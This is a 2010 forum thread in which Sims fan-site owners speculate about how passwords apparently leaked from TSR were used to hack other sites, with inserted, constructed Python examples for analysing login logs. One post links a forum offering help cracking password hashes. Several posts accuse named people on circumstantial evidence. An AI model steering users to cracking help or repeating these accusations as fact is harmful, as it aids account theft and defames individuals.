We did not find out how that could have happened either, and it also supports the theory that passwords somehow leaked from the TSR database.
We changed passwords on those FA accounts to completely random ones to rule out the possibility that they could have been obtained elsewhere, and even after that some accounts were compromised.


"The UK" is not really a meaningful location to fit things to, as many people come from that area, including, but not limited to, say, Atwa, IIRC.

Unless said person were, say, from the UK. In truth, the Sherriesim detail doesn't really answer the question of where the passwords came from. It only tells us that the attacker who directly carried out the action was possibly not Thomas himself.

It's more specific than "The UK"; at least one of the Sherriesim IPs comes from a Manchester ISP. Since this happened some time ago it might be hard to get more information about this now, but if some other site owner is willing to have a look in the logs we could perhaps shed even more light on this.
Indeed it does not answer the question of where the password came from, but it says something about who did it.

YOU simply wouldn't believe it. And you're right: There's absolutely no logical gain to be had from such an act. Doesn't mean people, particularly artiste-types, don't frequently and consistently behave stupidly and illogically. As a computer tech, this idea is probably not something you really grok, but people are frequently very stupid, irrational, and short-sighted. This is why they buy insurance, lottery tickets, and crap some spammer shilled.

Assuming the following hackings on various sites were also Thomas, that would amount to a level of stupidity I can't even begin to imagine given the debacle the Buggybooz incident resulted in.
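The log work Johan describes in this exchange (a rare useragent seen both through a public proxy IP and through a non-proxy ISP IP, and an invitation to other site owners to look for the same useragent/IP pair in their own logs), together with the login-failure trace Pescado says a password-guessing attack leaves, expressed as queries over a login log. This is an added example written for this page; none of the accounts, addresses, useragent strings or log lines below come from TSR, MTS or anyone's real logs. They are constructed (addresses from the RFC 5737 documentation ranges) and the proxy list is likewise assumed.

```python
"""Pivoting on useragent and IP in a forum login log, and spotting a guessing attack.

Added example for this page.  Accounts, addresses (RFC 5737 documentation
ranges), useragent strings and the proxy list are all constructed; nothing
here is from TSR, MTS or any real log.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

UA_RARE = "Opera/9.64 (Windows NT 5.1; U; en)"
UA_COMMON = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
UA_OTHER = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8) Firefox/3.5"

KNOWN_PROXIES = {"192.0.2.50"}  # assumed: a known public proxy address

SAMPLE_LOG = [  # constructed login log, one line per attempt
    f'2010-01-03T10:00:00 user=alice ip=203.0.113.7 result=ok ua="{UA_COMMON}"',
    f'2010-01-03T10:05:00 user=bob ip=203.0.113.22 result=ok ua="{UA_COMMON}"',
    f'2010-01-04T22:10:00 user=alice ip=192.0.2.50 result=ok ua="{UA_RARE}"',
    f'2010-01-04T22:12:00 user=carol ip=192.0.2.50 result=ok ua="{UA_RARE}"',
    f'2010-01-05T09:30:00 user=alice ip=198.51.100.9 result=ok ua="{UA_RARE}"',
    f'2010-01-06T01:00:00 user=dave ip=203.0.113.99 result=fail ua="{UA_COMMON}"',
    f'2010-01-06T01:00:10 user=dave ip=203.0.113.99 result=fail ua="{UA_COMMON}"',
    f'2010-01-06T01:00:25 user=dave ip=203.0.113.99 result=fail ua="{UA_COMMON}"',
    f'2010-01-06T01:00:40 user=dave ip=203.0.113.99 result=ok ua="{UA_COMMON}"',
    f'2010-01-06T03:00:00 user=erin ip=192.0.2.50 result=ok ua="{UA_OTHER}"',
    f'2010-01-07T18:45:00 user=bob ip=203.0.113.22 result=ok ua="{UA_COMMON}"',
    "2010-01-07T18:46:00 truncated line the parser must skip",
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) ip=(?P<ip>\S+) result=(?P<result>\S+) ua="(?P<ua>[^"]*)"$'
)


def parse_log(lines):
    """Parse the assumed log format; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def rare_user_agents(events, max_events=3):
    """Useragent strings seen in at most `max_events` attempts: candidates to pivot on."""
    counts = Counter(ev["ua"] for ev in events)
    return sorted(ua for ua, n in counts.items() if n <= max_events)


def pivot_on_ua(events, ua, proxies):
    """Accounts logged in with this useragent, and whether the source IPs were
    known proxies or direct addresses (a direct ISP address is what makes the
    Sherriesim detail significant in the thread)."""
    accounts, proxy_ips, direct_ips = set(), set(), set()
    for ev in events:
        if ev["ua"] != ua or ev["result"] != "ok":
            continue
        accounts.add(ev["user"])
        (proxy_ips if ev["ip"] in proxies else direct_ips).add(ev["ip"])
    return {"accounts": sorted(accounts), "proxy_ips": sorted(proxy_ips),
            "direct_ips": sorted(direct_ips)}


def accounts_sharing_ip(events, ip):
    """Everyone who logged in from one address: for a public proxy this list is
    long and unrelated, which is all it proves."""
    return sorted({ev["user"] for ev in events if ev["ip"] == ip and ev["result"] == "ok"})


def guessing_signature(events, min_failures=3, window_seconds=300):
    """Successful logins preceded by >= min_failures failures from the same IP
    on the same account within the window: the trace a lucky guesser leaves
    and a stolen password does not."""
    hits, failures = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["user"], ev["ip"])
        recent = [t for t in failures[key] if (ev["ts"] - t).total_seconds() <= window_seconds]
        if ev["result"] == "ok":
            if len(recent) >= min_failures:
                hits.append((ev["user"], ev["ip"], len(recent)))
            failures[key] = []
        else:
            failures[key] = recent + [ev["ts"]]
    return hits


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("rare UAs:", rare_user_agents(events))
    print("pivot:", pivot_on_ua(events, UA_RARE, KNOWN_PROXIES))
    print("proxy users:", accounts_sharing_ip(events, "192.0.2.50"))
    print("guessing:", guessing_signature(events))
```

Run over a real log the same three questions apply: which useragents are rare enough to be worth pivoting on, which of their source addresses are proxies versus direct ISP addresses, and whether any compromised account shows a burst of failures before the successful login. A clean success with no preceding failures is consistent with a password that was already known, not guessed.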


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 15, 08:56:49
http://www.waraxe.us/forum-57.html
This is an example of where you could get information on how to crack a hashed password, find someone to crack it for you and even get help hacking a forum.
Scriptkiddy site. Common, but of no real use. This misses one severe underlying difficulty: To get a HASHED password, you need to have access to the database the hashed password CAME from. You already admitted TSR didn't hash them, so getting access to the TSR database would have bypassed this problem to begin with. Conversely, if someone got a password from ELSEWHERE, they would not be able to know which ones are the same as TSR's, and therefore, would not be able to attack pretending the information came from TSR when it did not. Therefore, there are no plausible scenarios for this OTHER than the TSR-origin scenario. Can you think of a plausible origin in which someone could somehow acquire compromised passwords from a non-TSR source, and then make them look like they came from TSR without access to TSR itself? I can't. Even if the information could be gained from elsewhere, which is not likely, since you would need DB access there, too, there is no way to massage this information to then make it look like it came from TSR.

The main reason I don't want to write this scenario off completely is that we have had other events where someone managed to log in on multiple FA accounts on TSR and was able to delete things.
I'm not sure which incidents you're referring to, but if you're talking about what I think you're talking about, I seem to recall incidents in which an actual FA decided to soup from TSR, and did this on their own. This act was then immediately written off as the work of "hackers" officially.

We did not find out how that could have happened either, and it also supports the theory that passwords somehow leaked from the TSR database.
We changed passwords on those FA accounts to completely random ones to rule out the possibility that they could have been obtained elsewhere, and even after that some accounts were compromised.
Alternatively, if we're talking about the same incident, or even a similar case, they COULD have simply bypassed the password change using the lost password recovery system, if they had access to the email, either because they actually *WERE* the user in question, only behaving in a manner that your staff didn't approve of by trying to leave, or because they had already hacked that particular user completely.

Assuming the following hackings on various sites were also Thomas, that would amount to a level of stupidity I can't even begin to imagine given the debacle the Buggybooz incident resulted in.
We have never specified that Thomas himself committed the hackings. In fact, this scenario seems unlikely. The more plausible scenario is that someone, possibly Thomas, possibly someone else, provided the agent who then proceeded to do this with the information needed to carry it out, and then turned them loose, disavowing any responsibility for their actions. While the Buggybooz incident turned out to be somewhat of a disaster, this may not even have been an intended outcome: It is possible that the original information was released for some other purpose, and, well, you can't put the genie back in the bottle.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 15, 09:08:14
But Pescado, what you're not seeing is that TSR don't *want* these hacking attacks that could look like TSR-related-originated-assisted to happen as it is bad publicity. So why would they do them? It's not like they're getting rid of pirate content, as everyone knows the hacked site owner simply restores the site immediately. The anti-TSR brigade have far more motive to be doing this - "false flag" you call it?


Title: Re: GSC has been hacked
Post by: Soggy Fox on 2010 January 15, 14:24:45
It could just be that, intent aside, they are not as good at covering their tracks. If being forced to watch Smoking Gun presents: World's Dumbest..... is anything to go by, most people might think they are being clever, but really aren't.


Title: Re: GSC has been hacked
Post by: Zazazu on 2010 January 15, 17:13:22
The intent could just be for the "hacker" to look like they have a big dick. Even if they know they aren't causing permanent damage, they are causing those they believe to be pirates some frustration, which gives them the giggles.

As a T with some F, I say that a twin *would* know if their twin was lying. Whether techie or artistic. And the liar would be finding it increasingly hard to look nonchalant as the pressure is maintained and the income of several people they are close to reduces as a result.
I am a horrible liar, so much so that I haven't even attempted one since I was a new 18. However, I can lie easily and do to my parents. The 'rents think I have a degree. They have seen a copy of this degree. They know the supposed classes I took while I finished said degree. I'd argue that sometimes the easiest people to lie to are family.

That said, I don't think it is Thomas doing the dastardly deeds. I have a few ideas, not limited to Atwa. I have absolutely no proof...just going off of general attitudes I've observed from being on both sides of the fence.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 15, 22:03:00
Scriptkiddy site. Common, but of no real use. This misses one severe underlying difficulty: To get a HASHED password, you need to have access to the database the hashed password CAME from. You already admitted TSR didn't hash them, so getting access to the TSR database would have bypassed this problem to begin with. Conversely, if someone got a password from ELSEWHERE, they would not be able to know which ones are the same as TSR's, and therefore, would not be able to attack pretending the information came from TSR when it did not. Therefore, there are no plausible scenarios for this OTHER than the TSR-origin scenario. Can you think of a plausible origin in which someone could somehow acquire compromised passwords from a non-TSR source, and then make them look like they came from TSR without access to TSR itself? I can't. Even if the information could be gained from elsewhere, which is not likely, since you would need DB access there, too, there is no way to massage this information to then make it look like it came from TSR.

It looks like a pretty good place to get help cracking a password if you have the hash and the salt. Most such requests seem to be answered very fast.
I'm not saying it's easy to get access to a database and obtain the necessary information; I'm just saying that IF you do, it would be far from impossible to crack the passwords.
Not as easy as plaintext passwords of course, but doable.

Regardless of the origin, TSR or elsewhere, you would need DB access to get the plaintext or hashed password, with or without the help of someone with such access.
Not sure I understand what you mean by "make them look like they came from TSR", but if a password is the same on both TSR and some other place there would be no need to massage it to make it look like it came from TSR?

I'm not sure which incidents you're referring to, but if you're talking about what I think you're talking about, I seem to recall incidents in which an actual FA decided to soup from TSR, and did this on their own. This act was then immediately written off as the work of "hackers" officially.

Alternatively, if we're talking about the same incident, or even a similar case, they COULD have simply bypassed the password change using the lost password recovery system, if they had access to the email, either because they actually *WERE* the user in question, only behaving in a manner that your staff didn't approve of by trying to leave, or because they had already hacked that particular user completely.

I'm not sure I know what incident you're talking about, but I don't think it's the same as I was thinking of.
Multiple FA accounts were affected and AFAIK none of them left us, at least not soon after. This happened at least 2 times.
We gave out the new random passwords in chat, but as you say the new password could also have been obtained by the password recovery system we had when passwords were in plaintext. So if someone's email was compromised that would be one way to obtain it.
The relatively large number of accounts affected makes the probability of that scenario rather low though.

We have never specified that Thomas himself committed the hackings. In fact, this scenario seems unlikely. The more plausible scenario is that someone, possibly Thomas, possibly someone else, provided the agent who then proceeded to do this with the information needed to carry it out, and then turned them loose, disavowing any responsibility for their actions. While the Buggybooz incident turned out to be somewhat of a disaster, this may not even have been an intended outcome: It is possible that the original information was released for some other purpose, and, well, you can't put the genie back in the bottle.

You're also saying the following hackings after Buggy up until Scotty and Witchboy are linked and follow the same pattern, which implies that one of the owners would still be supplying this agent with passwords.
Since we changed to hashed passwords they can no longer be supplied in plaintext.
In order to obtain the hashed ones you would need to know how to access the database and pull data from it. You would also need to obtain the salt, which is stored elsewhere.

Per and I are the only ones that would be able to do that, and we didn't.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 15, 23:31:46
We gave out the new random passwords in chat

!! How secure is that?


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 15, 23:35:39
We gave out the new random passwords in chat

!! How secure is that?

Private individual chat, of course; I don't know if it was IRC or Skype, perhaps both.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 16, 00:11:51
Regardless of the origin, TSR or elsewhere, you would need DB access to get the plaintext or hashed password, with or without the help of someone with such access.
Not sure I understand what you mean by "make them look like they came from TSR", but if a password is the same on both TSR and some other place there would be no need to massage it to make it look like it came from TSR?
Meaning, in order for someone to use passwords as if they came from TSR, they would have to make sure to ONLY use those that matched TSR passwords. They would thus have to intentionally pass up attack on people whose passwords they had, but could not access from TSR. Additionally, how would they KNOW the passwords matched TSR unless they tried them, and thus made it apparent that this was occurring? Without the knowledge that the passwords actually DID match TSR's passwords, the attack pattern could not be matched to TSR.

I'm not sure I know what incident you're talking about, but I don't think it's the same as I was thinking of.
Multiple FA accounts were affected and AFAIK none of them left us, at least not soon after. This happened at least 2 times.
2 known incidents are not really relatable. Not every incident of vandalism is through the same vector or related. In fact, if someone really HAD externally compromised your DB, you would be seeing a lot more damage than two isolated wipes of FA accounts.

We gave out the new random passwords in chat, but as you say the new password could also have been obtained by the password recovery system we had when passwords were in plaintext. So if someone's email was compromised that would be one way to obtain it.
The relatively large number of accounts affected makes the probability of that scenario rather low though.
You say "at least 2". That is not quite a large number, especially in the absence of any other connection. There are plenty of reasons why a password could be compromised in a vacuum without the need to resort to hacking theories, particularly when the vandalism is apparently unrelated, and much of this doesn't even qualify as hacking. Cats and angry siblings can cause plenty of random deletions without any hacking at all.

You're also saying the following hackings after Buggy up until Scotty and Witchboy are linked and follow the same pattern, which implies that one of the owners would still be supplying this agent with passwords.
Or that the old password sheet is still alive and still held by the hacker.


Title: Re: GSC has been hacked
Post by: retrotrut on 2010 January 16, 19:10:08
Oh man, that's the second Sims site that got hacked. The other day, I think it was around April last year, I went on Exnem Sims and someone had hacked it completely and deleted ALL the Community Downloads. And when I went into the forums it said "F*** You, This F***ing server is being hacked". That's all that I remember, and the sad part was that Exnem couldn't back up his site. Poor them. However, I did manage to have some of the community downloads at the time, so I sent all I had to LyricLee.
At least your site has been saved. Exnem's site is completely ruined. :(


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 16, 23:14:57
Meaning, in order for someone to use passwords as if they came from TSR, they would have to make sure to ONLY use those that matched TSR passwords. They would thus have to intentionally pass up attack on people whose passwords they had, but could not access from TSR. Additionally, how would they KNOW the passwords matched TSR unless they tried them, and thus made it apparent that this was occurring? Without the knowledge that the passwords actually DID match TSR's passwords, the attack pattern could not be matched to TSR.
Assuming all attacks were made on accounts that had the same password on TSR, I can see what you mean. I don't think that is the case though?
Buggy is the only one I know for sure had the same password.

2 known incidents are not really relatable. Not every incident of vandalism is through the same vector or related. In fact, if someone really HAD externally compromised your DB, you would be seeing a lot more damage than two isolated wipes of FA accounts.

You say "at least 2". That is not quite a large number, especially in the absence of any other connection. There are plenty of reasons why a password could be compromised in a vacuum without the need to resort to hacking theories, particularly when the vandalism is apparently unrelated, and much of this doesn't even qualify as hacking. Cats and angry siblings can cause plenty of random deletions without any hacking at all.

It was two separate attacks where multiple accounts (I think it was 5-10) were compromised.
That was probably not a case of random vandalism; somehow the attacker either found a vulnerability or got hold of the passwords.

Or that the old password sheet is still alive and still held by the hacker.
Would be possible if someone got a dump of the whole member table, which couldn't have been done by Thomas.
That he would have compiled a list of selected people he wanted hacked, and that all the attacks we've seen came from that list, sounds unlikely to me.
A complete list of all the "TSR linked" attacks could help shed some light on this; the ones I know of are Buggy, Bluesoup (petition), Scotty and Witchboy.
Did I miss anyone?



Title: Re: GSC has been hacked
Post by: DrNerd on 2010 January 17, 01:01:21
A complete list of all the "TSR linked" attacks could help shed some light on this; the ones I know of are Buggy, Bluesoup (petition), Scotty and Witchboy.
Did I miss anyone?



The simsecret hacking over at LiveJournal has also been linked to Atwa/TSR, mainly because of IP similarities and the fact that the only posts that were deleted were ones with anti-TSR secrets.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 17, 02:26:52
It was two separate attacks where multiple accounts (i think it was 5-10) were compromised.
That was probably not a case of random vandalism, somehow the attacker either found a vulnerability or got a hold of the passwords.
The latter seems more likely. If a true vulnerability existed, it would not have been easy to selectively target data using an SQL or PHP vulnerability, and your attacker would have simply deleted everything. Similarly, admin-level password compromise is thus unlikely, as if someone had an admin password, they would have been able to do far more damage.

Would be possible if someone got a dump of the whole member table, which couldn't have been done by Thomas.
Is there a technical reason, other than possibly sheer size, that would have made this impossible?

That he would have compiled a list of selected people he wanted hacked and all the attacks we've seen came from that list sounds unlikely to me.
This does sound excessively laborious, but not impossible, if he selectively compiled anti-paysite activists. The more likely scenario is still whole or partial membertable dumping.

A complete list of all the "TSR linked" attacks could help shed some light on this; the ones I know of are Buggy, Bluesoup (petition), Scotty and Witchboy.
Did I miss anyone?
Of the known attacks, the Buggybooz, Shanow, and Scotty attacks are the ones known to me to have confirmed the TSR-password link. There may be others I don't recall offhand, and in none of the unconfirmed cases has this been ruled out as a possibility.


Title: Re: GSC has been hacked
Post by: Assmitten on 2010 January 17, 04:15:35
I am a horrible liar, so much so that I haven't even attempted one since I was a new 18. However, I can lie easily and do to my parents. The 'rents think I have a degree. They have seen a copy of this degree. They know the supposed classes I took while I finished said degree. I'd argue that sometimes the easiest people to lie to are family.

So you printed out a fake degree?? Please tell me you used comic sans.


Title: Re: GSC has been hacked
Post by: Zazazu on 2010 January 17, 05:26:47
Nah, that's on my totally for real minister certificate from the Universal Church of Whatever or Such.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 17, 08:40:26
But Pescado, what you're not seeing is that TSR don't *want* these hacking attacks that could look like TSR-related-originated-assisted to happen as it is bad publicity.  So why would they do them?
e-Peen? It's a surprisingly common motivation for seemingly illogical and counterproductive acts.

It's not like they're getting rid of pirate content, as everyone knows the hacked site owner simply restores the site immediately.  The anti-TSR brigade have far more motive to be doing this - "false flag" you call it?
Except for the catch: Assuming that TSR is NOT responsible, there is no plausible way an anti-TSR faction could acquire the technical data needed to carry out the attacks AND frame TSR for providing the data, without the complicity of at least one agent inside TSR. So even if they wanted to, they couldn't. In order to catch a large number of usable passwords like this, someone would either need to run a highly sophisticated phishing operation AND a means of verifying that the passwords stolen are shared WITHOUT simply trying them on TSR and thus setting off alarms.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 17, 08:58:28
Well, all this theorising on what errors of judgement may have taken place and what loose cannons they may have fired is still firmly in the realms of speculation. The perp is as unlikely to be brought to justice as PMBD is, and for similar reasons.

What is the desired outcome, and how can this speculation help to bring it about?

Sysadmins - never use the same password on sites you have authority over, or investment in, as you do on ones where you are merely a visitor. Always change your password and other system details after falling out with a fellow admin, and ensure the ex-admin is removed from *all* his membergroups - or delete his account and ask him to make a new one as a regular user.
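The offboarding check in the post above, written out as an added example (not code from this thread or from any forum software). It assumes an SMF-style member table where the primary group sits in id_group and further groups are a comma-separated string in additional_groups; the group ids, member rows and dates are constructed for the example. The point it makes is that an ex-admin can keep the Administrator group through additional_groups even after the primary group is reset, which is why the audit has to look at both fields.

```python
from datetime import date

# Assumed SMF-like member table layout: the primary group is id_group and extra
# groups live in additional_groups as a comma-separated string. The rows, names,
# group ids and dates below are constructed for this example, not real data.
PRIVILEGED_GROUPS = {1: "Administrator", 2: "Global Moderator"}

MEMBERS = [
    {"name": "current_admin", "id_group": 1, "additional_groups": "", "pw_changed": date(2010, 1, 12)},
    # primary group already reset to regular, but the admin group lingers in additional_groups
    {"name": "ex_admin", "id_group": 0, "additional_groups": "2,1", "pw_changed": date(2009, 6, 1)},
    {"name": "mod_bob", "id_group": 2, "additional_groups": "", "pw_changed": date(2009, 12, 1)},
    {"name": "regular", "id_group": 0, "additional_groups": "", "pw_changed": date(2009, 5, 1)},
]


def groups_of(member):
    """All group ids a member holds, primary and additional alike."""
    groups = {int(member["id_group"])}
    for g in member["additional_groups"].split(","):
        if g.strip():
            groups.add(int(g))
    return groups


def lingering_privileges(members, offboarded):
    """Offboarded names that still hold any privileged group anywhere.

    Checking id_group alone would report nothing for 'ex_admin' above; the
    privileged membership survives in additional_groups.
    """
    findings = []
    for m in members:
        if m["name"] not in offboarded:
            continue
        held = sorted(g for g in groups_of(m) if g in PRIVILEGED_GROUPS)
        if held:
            findings.append((m["name"], [PRIVILEGED_GROUPS[g] for g in held]))
    return findings


def stale_credentials(members, falling_out_iso):
    """Privileged accounts whose password was not changed after the split date
    (ISO string, e.g. '2010-01-01'): these still need rotating."""
    cutoff = date.fromisoformat(falling_out_iso)
    return sorted(
        m["name"] for m in members
        if groups_of(m) & set(PRIVILEGED_GROUPS) and m["pw_changed"] <= cutoff
    )


if __name__ == "__main__":
    print("lingering privileges:", lingering_privileges(MEMBERS, {"ex_admin"}))
    print("not rotated since split:", stale_credentials(MEMBERS, "2010-01-01"))
```

Run against a real member table the two functions would be fed rows from the database instead of MEMBERS; the group ids in PRIVILEGED_GROUPS need to match the forum's own configuration.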


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 17, 22:50:27
The simsecret hacking over at LiveJournal has also been linked to Atwa/TSR, mainly because of IP similarities and the fact that the only posts that were deleted were ones with anti-TSR secrets.
Do we know who had the account and if that person had an account on TSR with the same password?


Title: Re: GSC has been hacked
Post by: DrNerd on 2010 January 17, 23:05:54
The simsecret hacking over at LiveJournal has also been linked to Atwa/TSR, mainly because of IP similarities and the fact that the only posts that were deleted were ones with anti-TSR secrets.
Do we know who had the account and if that person had an account on TSR with the same password?

I don't recall which of the former admins it was (sinthe, maybe), but she did admit at the time that she'd used the same username and password on TSR.
The IP info is here. (http://tsr.mustbedestroyed.org/?p=462)

Simsecret posts regarding the hacking are here (http://community.livejournal.com/simsecret/2008/11/17/) and here. (http://community.livejournal.com/simsecret/2008/11/18/)


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 17, 23:34:14
The latter seems more likely. If a true vulnerability existed, it would not have been easy to selectively target data using an SQL or PHP vulnerability, and your attacker would have simply deleted everything. Similarly, admin-level password compromise is thus unlikely, as if someone had an admin password, they would have been able to do far more damage.

Yeah, I think I'm leaning towards that option too. One strange detail though was that there had been some failed login attempts on some accounts using the wrong random passwords.

Is there a technical reason, other than possibly sheer size, that would have made this impossible?

Yeah, the technical reason being that he wouldn't be able to dump the member table even if he had a GUI db client and all the necessary information to connect to the database; Thomas is a pixel pusher and he doesn't know how that stuff works.
We don't have any functionality to get a list of passwords in admin, so he would have had to pick them one by one to compile a list, which due to sheer size is next to impossible.

This does sound excessively laborious, but not impossible, if he selectively compiled anti-paysite activists. The more likely scenario is still whole or partial membertable dumping.

Theoretically possible, but then again I have a lot of reason to believe he wouldn't do that. Membertable dump is definitely more likely than that, but just as scary.

Of the known attacks, the Buggybooz, Shanow, and Scotty attacks are the ones known to me to have confirmed the TSR-password link. There may be others I don't recall offhand, and in none of the unconfirmed cases has this been ruled out as a possibility.
Have there been attacks where it has been confirmed that the password was not the same as a TSR account?


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 18, 00:06:09
I don't recall which of the former admins it was (sinthe, maybe), but she did admit at the time that she'd used the same username and password on TSR.
The IP info is here. (http://tsr.mustbedestroyed.org/?p=462)

Simsecret posts regarding the hacking are here (http://community.livejournal.com/simsecret/2008/11/17/) and here. (http://community.livejournal.com/simsecret/2008/11/18/)

I've done some digging and from what I can tell it was Sinthe and a shared account (secret poster or something like that) that was compromised.
Some further digging got me to a post on PMBD where Delphy showed a screenshot from Sinthe with the logins, which I assume was for when simsecret got hacked (not sure about that though):
http://phorum.mustnotbenamed.com/index.php/topic,2399.msg141367.html#msg141367

The combination of IPs and user agent definitely points to the same perpetrator as in the Buggybooz incident.


Title: Re: GSC has been hacked
Post by: Witchboy on 2010 January 18, 04:52:41
The user agent for the IP that hacked into SV & GSC is as follows...

IP: 83.170.113.97 User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 18, 05:15:24
Yeah, I think I'm leaning towards that option too. One strange detail though was that there had been some failed login attempts on some accounts using the wrong random passwords.
That doesn't mean anything. Random people randomly rattle doors on accounts all the time. This would only be a concern if there was a systemic pattern of door-rattling. Given that you run a paysite, it's entirely reasonable to expect that random people will attempt to rattle the doors on accounts simply to see if they can get any free swag, and people also lose their passwords and try to guess which of the set of usual passwords was the right one. Given the sheer size of your site, hundreds if not thousands of such attempts are probably made every week. The SUSPICIOUS thing would be when a strange IP logged into an account, then did nothing with it, and that account was subsequently attacked elsewhere, meaning that someone was trying to probe for a TSR commonality before attempting an attack.

Yeah, the technical reason being that he wouldn't be able to dump the member table even if he had a GUI db client and all the necessary information to connect to the database; Thomas is a pixel pusher and he doesn't know how that stuff works.
I dunno about that. I mean, Spilt Pee Soup, a thoroughly nontechnical user, managed to figure out how to use phpmyadmin just fine. Also, there is no guarantee it was Thomas who personally did it. Thomas is the most likely suspect purely based on motives and opportunity, but he isn't the only one who could have done it.

We don't have any functionality to get a list of passwords in admin, so he would have had to pick them one by one to compile a list, which due to sheer size is next to impossible.
Or, he could dump the entire thing and do a CTRL-F...

Theoretically possible but then again i have a lot of reason to believe he wouldn't do that. Membertable dump is definitely more likely than that but just as scary.
The exact methodology by which the information was acquired from the database is really less important than the fact that it clearly had to have been.

Have there been attacks where it has been confirmed that the password was not the same as a TSR account?
No. There have been no negative confirmations where a password-attack was conclusively NOT a TSR account password, only cases where confirmation could not be acquired due to either the user not remembering, or not being present. All other hacking attacks not related or suspected to be related to TSR account passwords have all been dismissed as common vandalism and bear no connection to any community politics.
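The distinction Pescado draws in the post above, background door-rattling versus a login from a strange IP that then does nothing and is followed by an attack on the same account elsewhere, as an added example of how a site admin could check their own auth logs for it. This is not code from the thread or from any of the sites discussed; the log format, the event names, the IP addresses, accounts and the off-site incident list are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of forum auth/activity events (not real logs). One event per
# line: ISO timestamp, account, source IP, and event type, where "fail" is a failed
# login, "login" a successful one, and post/edit/delete are ordinary activity.
SAMPLE_LOG = """\
2010-01-09T10:00:00 account=bob ip=198.51.100.2 event=login
2010-01-09T10:05:00 account=bob ip=198.51.100.2 event=post
2010-01-10T02:11:00 account=alice ip=203.0.113.5 event=fail
2010-01-10T02:11:30 account=alice ip=203.0.113.5 event=login
2010-01-10T02:15:00 account=alice ip=203.0.113.5 event=post
2010-01-10T03:00:00 account=bob ip=198.51.100.9 event=fail
2010-01-10T03:00:05 account=carol ip=198.51.100.9 event=fail
2010-01-10T03:00:10 account=dave ip=198.51.100.9 event=fail
2010-01-10T03:00:15 account=erin ip=198.51.100.9 event=fail
2010-01-10T09:00:00 account=carol ip=192.0.2.40 event=fail
2010-01-10T09:01:00 account=carol ip=192.0.2.41 event=login
2010-01-10T09:30:00 account=carol ip=192.0.2.41 event=post
2010-01-12T23:40:00 account=bob ip=192.0.2.77 event=login
2010-01-13T10:00:00 account=bob ip=198.51.100.2 event=login
2010-01-13T10:05:00 account=bob ip=198.51.100.2 event=post
"""

# Constructed list of accounts hit on other sites: (account, site, time of the incident).
SAMPLE_INCIDENTS = [
    ("bob", "example-fansite", datetime(2010, 1, 14, 1, 0)),
]


def parse_log(text):
    """Turn the key=value log lines into dicts with a datetime under 'time'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["time"] = datetime.fromisoformat(ts)
        events.append(rec)
    return events


def systemic_failure_sources(events, min_accounts=3):
    """IPs whose failed logins are spread over many accounts: the systemic
    door-rattling worth looking at, as opposed to one user fumbling a password."""
    targets = defaultdict(set)
    for e in events:
        if e["event"] == "fail":
            targets[e["ip"]].add(e["account"])
    return {ip: sorted(a) for ip, a in targets.items() if len(a) >= min_accounts}


def silent_logins(events, quiet_window=timedelta(hours=2)):
    """Successful logins from an IP never before used by that account, with no
    activity from that IP inside quiet_window: the 'log in and do nothing' probe.
    An account's very first login is always a new IP, so a real deployment would
    seed 'seen' from history older than the window being examined."""
    activity = defaultdict(list)  # (account, ip) -> times of real activity
    for e in events:
        if e["event"] in ("post", "edit", "delete"):
            activity[(e["account"], e["ip"])].append(e["time"])
    seen = defaultdict(set)  # account -> IPs already used for a successful login
    probes = []
    for e in sorted(events, key=lambda r: r["time"]):
        if e["event"] != "login":
            continue
        new_ip = e["ip"] not in seen[e["account"]]
        seen[e["account"]].add(e["ip"])
        if not new_ip:
            continue
        acted = any(e["time"] <= t <= e["time"] + quiet_window
                    for t in activity[(e["account"], e["ip"])])
        if not acted:
            probes.append((e["account"], e["ip"], e["time"]))
    return probes


def correlate_with_incidents(probes, incidents, max_gap=timedelta(days=14)):
    """Pair each silent probe with a later off-site compromise of the same account."""
    hits = []
    for account, ip, t in probes:
        for inc_account, site, inc_time in incidents:
            if inc_account == account and t < inc_time <= t + max_gap:
                hits.append({"account": account, "probe_ip": ip, "probe_time": t,
                             "site": site, "incident_time": inc_time})
    return hits


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("mass door-rattling sources:", systemic_failure_sources(events))
    probes = silent_logins(events)
    print("silent new-IP logins:", probes)
    print("probe -> off-site incident:", correlate_with_incidents(probes, SAMPLE_INCIDENTS))
```

On the constructed data the scattered failures from 198.51.100.9 show up as a mass-guessing source, alice's and carol's logins from fresh IPs are ignored because they went on to post, and bob's silent login from 192.0.2.77 is the one that lines up with his account being hit elsewhere two days later.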


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 18, 07:34:44
Spilt Pee Soup, a thoroughly nontechnical user, managed to figure out how to use phpmyadmin just fine.

If you're talking about Brynne, I don't think she did. Every time she wanted to look at something she asked someone to do it for her, handing out temporary admin access if necessary. Lol, long after she thought she'd banned me I could have got in the back door. Fortunately for her I wasn't the shady character she thought I was.